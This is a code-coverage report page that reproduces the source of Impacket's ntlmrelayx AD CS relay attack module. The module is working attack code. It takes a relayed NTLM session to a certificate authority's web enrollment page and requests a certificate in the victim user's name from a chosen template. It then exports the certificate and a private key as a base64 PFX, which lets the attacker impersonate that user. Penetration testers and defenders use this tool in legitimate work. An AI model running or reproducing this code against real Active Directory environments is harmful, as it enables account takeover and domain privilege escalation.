Coverage for /root/GitHubProjects/impacket/impacket/examples/ntlmrelayx/attacks/httpattacks/adcsattack.py : 16%

Hot-keys on this page
r m x p toggle line displays
j k next/prev highlighted chunk
0 (zero) top of page
1 (one) first highlighted chunk
1# Impacket - Collection of Python classes for working with network protocols.
2#
3# SECUREAUTH LABS. Copyright (C) 2018 SecureAuth Corporation. All rights reserved.
4#
5# This software is provided under a slightly modified version
6# of the Apache Software License. See the accompanying LICENSE file
7# for more information.
8#
9# Description:
10# AD CS relay attack
11#
12# Authors:
13# Ex Android Dev (@ExAndroidDev)
14# Tw1sm (@Tw1sm)
16import re
17import base64
18from OpenSSL import crypto
20from impacket import LOG
22# cache already attacked clients
23ELEVATED = []
26class ADCSAttack:
28 def _run(self):
29 key = crypto.PKey()
30 key.generate_key(crypto.TYPE_RSA, 4096)
32 if self.username in ELEVATED:
33 LOG.info('Skipping user %s since attack was already performed' % self.username)
34 return
35 csr = self.generate_csr(key, self.username)
36 csr = csr.decode().replace("\n", "").replace("+", "%2b").replace(" ", "+")
37 LOG.info("CSR generated!")
39 data = "Mode=newreq&CertRequest=%s&CertAttrib=CertificateTemplate:%s&TargetStoreFlags=0&SaveCert=yes&ThumbPrint=" % (csr, self.config.template)
41 headers = {
42 "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0",
43 "Content-Type": "application/x-www-form-urlencoded",
44 "Content-Length": len(data)
45 }
47 LOG.info("Getting certificate...")
49 self.client.request("POST", "/certsrv/certfnsh.asp", body=data, headers=headers)
50 ELEVATED.append(self.username)
51 response = self.client.getresponse()
53 if response.status != 200:
54 LOG.error("Error getting certificate! Make sure you have entered valid certiface template.")
55 return
57 content = response.read()
58 found = re.findall(r'location="certnew.cer\?ReqID=(.*?)&', content.decode())
59 if len(found) == 0:
60 LOG.error("Error obtaining certificate!")
61 return
63 certificate_id = found[0]
65 self.client.request("GET", "/certsrv/certnew.cer?ReqID=" + certificate_id)
66 response = self.client.getresponse()
68 LOG.info("GOT CERTIFICATE!")
69 certificate = response.read().decode()
71 certificate_store = self.generate_pfx(key, certificate)
72 LOG.info("Base64 certificate of user %s: \n%s" % (self.username, base64.b64encode(certificate_store).decode()))
74 def generate_csr(self, key, CN):
75 LOG.info("Generating CSR...")
76 req = crypto.X509Req()
77 req.get_subject().CN = CN
78 req.set_pubkey(key)
79 req.sign(key, "sha256")
81 return crypto.dump_certificate_request(crypto.FILETYPE_PEM, req)
83 def generate_pfx(self, key, certificate):
84 certificate = crypto.load_certificate(crypto.FILETYPE_PEM, certificate)
85 p12 = crypto.PKCS12()
86 p12.set_certificate(certificate)
87 p12.set_privatekey(key)
88 return p12.export()